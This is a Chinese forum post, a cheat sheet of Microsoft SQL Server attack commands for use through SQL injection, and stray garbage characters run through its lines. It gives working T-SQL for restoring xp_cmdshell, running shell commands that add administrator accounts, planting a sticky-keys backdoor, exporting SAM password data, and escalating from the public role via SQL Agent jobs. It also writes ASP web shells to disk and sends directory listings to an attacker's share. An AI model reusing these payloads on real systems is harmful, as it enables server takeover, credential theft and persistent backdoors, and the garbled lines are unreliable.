1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号6 f3 U" i' K+ {: p/ D
恢复方法:查询分离器连接后,
( h7 F- ^" [4 w7 _1 m" T9 t第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
2 Y% V3 L5 z u& V第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' . Z* h2 R# V; z8 T5 a: M* u; r0 d
然后按F5键命令执行完毕
+ g$ }+ r3 M6 {5 }1 T; J* {3 h* R" v
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)/ l( k! n. h+ @
恢复方法:查询分离器连接后,' i9 r- Y1 n4 k% i1 S2 c
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"( A# t$ B1 l9 O4 U
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'8 ]9 p0 @. R R2 @2 R
然后按F5键命令执行完毕7 r- w/ i, O0 c$ @
. G; {. P* O* F: K3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。). v7 v8 e, q8 T6 i* ~ k9 x5 u
恢复方法:查询分离器连接后,& P- S' `# I6 m# D
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
* Y$ h9 m5 q( s+ p# j第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ) t& W* ~' c$ t/ G% Z
然后按F5键命令执行完毕
2 Y b9 e/ z6 K/ S7 W" F H7 n7 g( A. f$ P5 T& V# o
4 终极方法. m2 Y# e9 a% I7 ~' [0 j
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
% f& Q4 k4 z D$ L; P! c查询分离器连接后,: W/ C ?8 ?# ^. D1 @
2000servser系统:7 F- Y* w( j5 [0 T$ Y/ r- E' D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
0 q' N8 P0 s$ c# K
" ?! a/ }/ `+ n; Fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
9 s/ w' H8 A8 R+ d4 g0 l- }: ^7 G/ p+ W) z4 t& Y. [, W$ f# I
xp或2003server系统:/ r: Y4 f1 X" J; K# I
2 J! }" m$ _6 v0 ` O5 f
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
' [) l3 \) X: J" L
9 _0 c* Q, c& J; B' pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'( G b# h" w' J& `4 C$ x
% r8 }0 a7 _9 Z, u$ e
: t. ?+ r# g5 S( R1 U五个SHIFT
5 Y& h l, s+ {0 ?declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';: s+ r) Y2 Q9 D0 A; H& y3 O5 q. c0 ^# _
$ X# H2 a! @2 I, X \- Jdeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; . w8 j; v9 H" ]7 }0 Q( `
/ i4 m6 o1 L- s: K5 n
xp_cmdshell执行命令另一种方法
3 L& {: K8 f8 r. |6 sdeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
|5 Y$ d/ Z. D$ X
2 m) h+ l( e: O( J! C4 ]判断存储扩展是否存在
1 m( z! W/ i! KSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
; {( C5 [1 ^# c% R返回结果为1就OK
( i1 ]1 C8 Q6 w( \& E: d& S1 J$ ^0 o$ w1 E' M; v
/ K9 z4 ~( \2 C* S) K/ v上传xplog70.dll恢复xp_cmdshell语句:" j. B* `' h# [' s. }4 H
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'. l4 ]" o% |: t% ]
& I! T' l7 v8 z
否则上传xplog7.0.dll; `% c+ p, I* O* F8 P
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'. B" K% k6 M, l8 V+ k. } c
1 Z$ Q8 @$ m7 t+ V6 R0 w6 s
2 n+ W8 l4 M" o4 R$ X8 h. b7 k
8 m2 K; F8 G1 l* S: O& _首先开启沙盘模式:
; I" S) c6 l4 J0 @5 U7 Kexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
$ Z, r( O8 s( V' T6 q* [& f( F' W5 F5 R4 ?+ A4 A$ V0 o3 {+ c
然后利用jet.oledb执行系统命令
! L4 ~3 T. B& m) [" g9 `8 Eselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
4 o; r% X6 }3 Z( S) L返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
+ ~. [. y6 ~) p' K5 a. L! y1 P( I, }# I8 W6 r' e# P* N3 o" H0 F
* F* X, W( q5 l0 |" J5 v
3 S0 l+ Q# h2 C4 M3 q& X9 x; p恢复过程sp_addextendedproc 如下: 4 V' F2 W5 O5 t/ ]5 V$ Z3 I& ~
create procedure sp_addextendedproc --- 1996/08/30 20:13
/ ^/ {, G* Q3 i( r* }8 O: W, c@functname nvarchar(517),/* (owner.)name of function to call */
8 x7 z- e6 q% k' Y@dllname varchar(255)/* name of DLL containing function */
' T0 L' u/ @/ h, k3 Oas
3 h0 h+ q6 k4 ^/ ]set implicit_transactions off . S9 ~4 d x' l" Q" J
if @@trancount > 0
% m! D; x* S" s" R9 b1 T0 m: Pbegin
6 l+ w( c5 L9 E* Zraiserror(15002,-1,-1,'sp_addextendedproc')
( L6 Q8 T/ i( @( V5 B! `return (1)
& r. I) b# }/ z1 {9 \7 e) aend
1 ?! A3 v4 P, @dbcc addextendedproc( @functname, @dllname) 7 C% l' Z' K8 b3 U: I/ R5 f
return (0) -- sp_addextendedproc
" G' Y2 l0 K6 l" D Z* {GO
7 B: @5 c3 d9 @5 b3 T9 [% Y0 w4 h
$ u: z% P0 ^, u, H" J) G9 _$ V7 G* ~' R. [2 ?* L
" m7 Q9 t0 O4 h( g导出管理员密码文件
7 D% Y9 H: y8 v1 O) Z2 W5 k' psa默认可以读sam键.应该。0 f1 I/ d% A' L V# B) Z
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg& |9 A) N+ C' T( C: F* C8 |& S
net user administrator test* I8 M; p7 u. L; I/ a) x- q
用administrator登陆.
: w6 y- ?( O7 Z( k用完机器后" {1 g8 @; t3 w" n- O
reg import c:\test.reg
) e4 v0 `2 p. F7 S/ k7 V根本不用克隆.
" l2 S: `; o) Y$ \找到对应的sid. 4 D2 m9 `6 h5 e, Z0 L
% J% d# }1 M9 Z& [ c
. ~# t- d% |" X; S5 p: w3 z' q- \6 Y2 C1 A1 A
恢复所有存储过程' |. H& @& _' F. B# C: [' b
use master 4 I) k7 v% k% ^
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
' H! O9 Q. h2 {7 I& \- fexec sp_addextendedproc xp_fixeddrives,'xpstar.dll' ( d, G7 [+ W0 `" E7 L* C8 j# B
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' ) k" r. R9 d) g& q( [; k
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
( N6 @5 @" g# ^9 b3 i- Z, h2 Yexec sp_addextendedproc xp_getfiledetails,'xpstar.dll' ( G6 i. U9 W( }3 i5 _
exec sp_addextendedproc sp_OACreate,'odsole70.dll' $ q! ~2 W( }0 a3 [5 s
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
* u, B% ?9 e, r% l% v# Kexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 7 X* g$ ]: v8 S
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
/ l* r9 ?5 ~0 t% k `' p( r) Q2 Iexec sp_addextendedproc sp_OAMethod,'odsole70.dll' . r6 J6 L8 b5 y* ]7 m, n# k
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
: W- B& W# ?# e/ M( b6 eexec sp_addextendedproc sp_OAStop,'odsole70.dll' + w# A7 c( m+ k& z
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 1 O1 N# |$ s R Q
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
+ V7 G0 e2 E; n( S& f2 Rexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
! ?# }. h3 l$ D$ Q: v( X Cexec sp_addextendedproc xp_regenumvalues,'xpstar.dll' , M: K" Y! B* v5 ~+ O. b
exec sp_addextendedproc xp_regread,'xpstar.dll'
]1 I; X4 {0 R5 N3 rexec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' # R2 e& G$ ~* x6 c# F
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
% N1 M p( q: W5 ]9 N+ vexec sp_addextendedproc xp_availablemedia,'xpstar.dll'" S1 H3 F1 m# Z& M. X8 B. \
, q: T, v& t$ L" K$ W i
% j& ]5 x+ q+ }9 |, E- F建立读文件的存储过程8 g' T6 Z# ]6 R; p2 |
Create proc sp_readTextFile @filename sysname
0 q* x; f- ^6 C2 Eas
1 q7 W2 q, o! l
: \, w3 X' G6 K& p/ O begin $ n& R$ L: l: N2 a+ b+ W3 g
set nocount on 0 [1 u/ g% |" a" O1 r; Q
Create table #tempfile (line varchar(8000))% A# Y% |3 ?0 X& h# P) M ~
exec ('bulk insert #tempfile from "' + @filename + '"')
! v( D' @5 Q2 c select * from #tempfile
) m4 t1 y/ h( R% K- c6 Z/ F1 T- ? drop table #tempfile
* ~) J1 \* \3 o& a5 qEnd2 i2 U+ l; @$ T4 a9 b$ U- V
2 P; N! P2 Z5 b& g, zexec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
" o4 L0 Y5 k( e0 v! m9 _+ g查看登录用户; D0 E7 G& U; h4 O
Select * from sysxlogins
& S" b$ _- {) N# Q K" u' L& v
! p8 f( s1 ~& R! Q6 u; K9 g8 w9 T把文件内容读取到表中5 K0 v6 s$ ~9 _* L3 O
BULK INSERT tmp from "c:\test.txt"
2 x) l2 c/ k3 edElete from 表名 清理表里的内容$ l. k/ b' F2 N @. E _
create table b_test(fn nvarchar(4000));建一个表,字段为fn* T9 d8 X L5 {7 _
# y4 r6 T- k' h8 y: ~3 p+ y. q
+ _" M; w' C) V4 A x1 l& P; V$ Z加sa用户
+ C8 D6 o! A6 }5 E2 F; }exec master.dbo.sp_addlogin user,pass;' V. Q9 T2 Y+ d( j
exec master.dbo.sp_addsrvrolemember user,sysadmin0 v+ Y/ ^: O2 f8 L. i
' f1 v" B5 y5 e2 ^9 Z8 J
0 M/ f+ |: s+ {# \5 m4 l3 P+ z* N, K' X x w1 O! R
读文件代码
! ]5 j4 o6 d, ^6 j5 \) O! L1 Edeclare @o int, @f int, @t int, @ret int# l' Y7 V- O8 _5 K6 R* T
declare @line varchar(8000)8 e, Q! s& _1 Z; _1 y8 Y
exec sp_oacreate 'scripting.filesystemobject', @o out6 Q% E1 r& }5 B: z1 H
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
% F* l( ?, {5 ~8 rexec @ret = sp_oamethod @f, 'readline', @line out
3 V8 m' } b* lwhile( @ret = 0 )8 V/ ]9 y+ B1 C' i
begin) J$ q$ ]5 l6 r# N4 a& B0 w( S0 O
print @line% s* V- o! C* b; h$ E* m
exec @ret = sp_oamethod @f, 'readline', @line out v: a& f: A6 P8 v1 p
end( D6 g( ^2 B1 ]8 z% _7 C% A( g4 S- i
9 V P$ |% s7 g1 F8 Z% }
9 v% n% p9 S+ q0 G2 z3 M3 s' [
写文件代码:
1 B9 o, `1 c5 x! g( G; j. Gdeclare @o int, @f int, @t int, @ret int
8 I8 d" x$ i7 Q, c" S+ ^exec sp_oacreate 'scripting.filesystemobject', @o out" N+ I5 Z" [7 _4 n2 k% z- _
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
% {+ }+ s. s' k0 P y" `8 d0 gexec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
4 }7 c# T1 g' e: _
: X4 g+ m; b9 b# u$ x1 ~; p; W
9 Q8 C! C& P' h/ v; E# ?添加lake2 shell
8 W) t/ J, Q$ ?* b3 @sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
: B! j6 N7 X7 m& i: U* Z! msp_dropextendedproc xp_lake2
( a: T' U" X0 uEXEC xp_lake2 'net user'; Y" z' ^2 N" T4 r
4 s6 }" v5 v) j4 k, a$ ^
2 U* f" e, C+ E. b. n- I
得到硬盘文件信息
$ h& o& T/ @- u$ p1 o/ g9 P. v--参数说明:目录名,目录深度,是否显示文件 , F0 }( S" |' l8 j$ K2 V
execute master..xp_dirtree 'c:' 4 A$ |% i* \# D; R
execute master..xp_dirtree 'c:',1
2 X. F- F* }' U( g6 Yexecute master..xp_dirtree 'c:',1,1
! {$ m( `/ |& J; ]3 f: C$ A" ^& c6 o3 A5 F2 b; [
; J) w1 k/ @/ m读serv-u配置信息; a0 U) S5 o0 D$ U }( s
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
( v: x4 W+ p* H7 j8 D" e/ Cexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'3 K& u; G: n& A& _$ Z9 z
9 s& u5 h4 M1 o d通过xp_regwrite写SHIFT后门
# K/ [, x* O5 O' ^) q/ R; Wexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
( j' U( K! t+ i: U: g( `7 Y) a8 t5 S: S; J
' t; M2 s- X. `' Q
, X% x& U3 j6 M# f2 Y' ]( g- I找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';1 s* P' ~. `+ l- i" v) L! ]
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
# ^" v$ { |5 A) r/ S7 E
7 Q: n4 D; S/ X/ tEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'- p5 y5 M9 s( t, E. s
z, w- W* W+ a: y$ F( A% v
: |( ?0 M/ t1 A7 W! Z2 w2 O# S2 E( R% _/ Q- o
sql server 2005下开启xp_cmdshell的办法
]& `7 H! T( V2 t+ u7 ~; r
" e p" ]( d+ I. d5 v8 zEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;" F- B( u. O% |
1 a4 y, T. }- V& q
SQL2005开启'OPENROWSET'支持的方法:7 A8 v! E9 G) @6 B* I G
@; j1 O5 E: |3 M- F8 {- X! Pexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;# H4 P) A% m( E) I' w3 ?
0 w3 v. L7 K' {6 M
SQL2005开启'sp_oacreate'支持的方法:
( y/ P7 r4 [8 t# O' V7 S- k, n; v, {. e( E6 E
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
5 f- w" j5 j1 O/ W9 V9 K+ \) [+ y- G- D7 o q$ p
8 p# t8 a# f' g4 V
6 E% N7 F( J% g4 g% R+ L
+ E' d" x/ V" {. D4 z8 ?# D8 i4 v! R
/ a) Z8 c) K3 J2 x' r7 z
8 Y$ k4 O& l# h. r9 S, } z" e0 M/ C" e8 Y: [7 G+ F
- t6 O, N' H+ h4 S5 f/ C N9 Y0 a/ p! x' `+ R- q
" s, u' c: G5 A, y8 Q/ }
; w2 `4 f+ c7 x9 E: c3 s9 x
2 R. A9 T* j: F8 H# U: ]0 d. T$ h& B1 t: k7 T
: M8 p! A; B' S
" w# W3 g c ^" }" _+ |$ S( A5 R6 M* h
0 s0 n) i: o( K" |! z( N
- O( [* F8 P6 S' O1 ~2 V0 I' P, x+ B) Q7 p
3 \% K. \6 H$ \2 l$ x' S+ |% H+ O4 Z2 R& k" B8 [+ _* _! ~
# }5 s. y* n+ k. {6 [
0 P, k. _& c9 W( m$ F! D以下方面不知道能不能成功暂且留下研究哈:
6 q3 H4 _( B0 P+ }& R4)5 ?! W2 K' L9 [0 i' z! j; k
use msdb; --这儿不要是master哟6 T8 N" Q/ E4 J7 n/ J$ a) N/ _/ j
exec sp_add_job @job_name= czy82 ;' L! J( P0 p. K: ]/ f' L" t
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;+ I: C6 b9 _* X9 Y( J* d1 b
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;* f1 ^1 {; A: B! p% B5 l. J8 v M
exec sp_start_job @job_name= czy82 ;
& S& s7 e a4 a L
! M2 K" w4 v5 I7 T利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以, j4 [$ W U: G: l& u# G
执行tsql语句了.
( v4 V/ \+ \0 K O& I) B) h) b对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
8 I1 W. |" V& p) W第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)$ C: D: R: J/ I; Z: \
net start SQLSERVERAGENT
$ d2 p8 M: d+ X4 t0 u- n" q
) q* C+ ^+ p1 N7 O9 q E+ Q对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的" R9 \) }& j9 c/ s) b6 X& Y
USE msdb
% }% I& j/ x$ Y' P5 YEXEC sp_add_job @job_name = GetSystemOnSQL ,
9 A. \/ Y" H6 h4 F0 z4 ^" r$ {4 x@enabled = 1,( p, ~ H. V& Q' B% f& u/ m" N$ b
@description = This will give a low privileged user access to
; w3 A4 }' Z: i$ lxp_cmdshell ," @2 A' \7 g1 d P5 W& O' D
@delete_level = 1" T2 {( K6 ~3 S; c) `! g' [" w( K1 @
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,: u; ?+ T2 z, A7 t4 I) p9 P4 b
@step_name = Exec my sql ," S+ @) M+ v# I# H) [. X
@subsystem = TSQL ,# j* Y$ Z. \1 R
@command = exec master..xp_execresultset N select exec
( X% x& Z9 {; k4 l8 `$ U3 ?master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
7 j+ w6 c } u+ p) w- YEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,) Q3 g" N2 l% @0 l
@server_name = 你的SQL的服务器名 5 l9 O# n H& O$ p) Z
EXEC sp_start_job @job_name = GetSystemOnSQL
$ j4 Y( t2 B7 _/ B8 e0 a3 F2 G: E) |# H, V6 f- R0 N2 a. g
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以; t1 p; w- T' W
才让我们可以以public执行xp_cmdshell
0 X2 X% B Q2 @1 r( d K4 H0 o& w" j5 j: ` l. m
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)' L T g p8 S0 }" f
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
7 E$ j1 x! V( t5 n9 j( p% \2 u( T4 d* m; X7 w0 O4 U- o+ b! _7 D
USE msdb- F7 X2 j- g3 t, |+ ] `
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
$ V% @1 j8 W) }" x! W0 |9 \3 c0 e, }@enabled = 1,
: G, r0 r2 }* [@description = This will create a file called c:\sqlafc123.txt , U& z! T; B' M! f/ [: X0 }& `7 ]
@delete_level = 1) U7 v+ G2 L, W; `6 o2 O
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
1 h! L. ~# h) K. H* j2 o@step_name = SQLAFC , P# ?& Q$ E- Y3 V! D7 D( i
@subsystem = TSQL ,3 g# W4 X- t$ u9 T
@command = select hello, this file was created by the SQL Agent. ,
6 h1 Y4 W, ^# v! u@output_file_name = c:\sqlafc123.txt
, {6 t! D0 S- H1 ]* q3 mEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,) }7 B7 Q3 f- J& g* A* z, D# K) U8 @
@server_name = SERVER_NAME * N) B7 @. {/ _
EXEC sp_start_job @job_name = ArbitraryFilecreate / T% z! `' s* H) B' G
' |: A+ X4 \) }
如果subsystem选的是:tsql,在生成的文件的头部有如下内容/ q, I; S' i8 c j+ u4 F
% v% T. M; ~1 L/ L5 i1 f??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
* C' o0 X/ f& z" N. w; _! D) c0 g) K( O4 \----------------------------------------------
) k' d: F; n+ Q0 \- {. g& Dhello, this file was created by the SQL Agent.- T2 x9 k1 I2 g! X2 E; Z- w) W1 ^
7 i9 n) [1 G+ l2 ~7 x+ ?
(1 ?????)
4 t: \) u0 [) @9 D/ P) b' {" q! |
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员9 o0 d8 u1 Z& Y: G
命令的vbs文件到启动目录!
: Y' f' Q9 T. Q
( a/ j1 Q, _6 {4 p6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
% P1 b% g% T, o/ T7 Y, ?- T关于sp_MScopyscriptfile 看下面的例子
. T/ n, U$ @! J, v3 r6 odeclare @command varchar(100)
: }5 O1 C9 l: m( P% N" E& T! \* Udeclare @scripfile varchar(200)
- Z, o( H( e$ T. mset concat_null_yields_null off
9 n- D7 y9 L$ p9 V: z4 c1 R% uselect @command= dir c:\ > "\\attackerip\share\dir.txt"
H5 j. R/ Q/ h# a1 L# {* Lselect @scripfile= c:\autoexec.bat > nul" | @command | rd " 7 l( ^) Z5 x7 v& J) p9 E+ J9 a
exec sp_MScopyscriptfile @scripfile ,
# R; y% w& Z" r" p4 o* ~7 t+ R* ^# M# u# k r7 S' z" T" R0 F
这两个东东都还在测试试哟
2 J' ?# y+ a( V' O% K$ e: I: Y' d让MSSQL的public用户得到一个本机的web shell
% E9 t1 Q) A: r" S; ^5 ^( z' K' W S* m; k( t! s
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
" k8 Q% K8 @+ U' X--@query= select <img src=vbscript:msgbox(now())> " Z, ~! @5 H6 Y5 |( w7 N6 Y" s6 }7 U
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
1 u3 b" `- ^4 G ~+ f@query= select
/ k4 a6 B0 V! t0 L s<%On Error Resume Next
: F4 A& I% r! j* Q7 Q7 i% hSet oscript = Server.createObject("wscript.SHELL")
0 z" I Z$ Y& v) @) U" k* gSet oscriptNet = Server.createObject("wscript.NETWORK")
* h' m3 s$ |8 B% M+ K2 V- RSet oFileSys = Server.createObject("scripting.FileSystemObject")
1 I: c- R G, P3 a: `+ MszCMD = Request.Form(".CMD")
$ @: s B- ~/ B- B5 f$ @) W% H* dIf (szCMD <>"")Then % j( M) K' J8 M1 C
szTempFile = "C:\" & oFileSys.GetTempName()
& p! i0 g7 J' s. L3 {/ lCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 3 x% u) d# }( {; x6 |; f
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
6 X+ K: G3 A: s M K7 D1 i' cEnd If %> ) |% X: z' K S7 q; j4 S- Z0 o) a: i! U
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
: w; k& O( w: G8 f' h<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
5 A3 r/ N% y6 I</FORM><RE>
( V0 a+ v" c8 G: @! e<% If (IsObject(oFile))Then
8 q) u% b7 ~' s6 zOn Error Resume Next
' X+ L% O; V2 M1 N/ |0 [$ dResponse.Write Server.HTMLEncode(oFile.ReadAll)
" q/ `7 x _5 p) Y# j+ v8 O: n6 f! roFile.Close $ T6 B" O6 C8 Y9 a$ B' M
Call oFileSys.deleteFile(szTempFile, True)
8 t3 x4 f& t% y) ^0 \: s% l1 iEnd If%> " m, }) R! g0 f3 Z9 f
</BODY></HTML> 0 F; y% l% y3 {. X
|
发表于 2012-9-15 14:37:30
收藏
支持
反对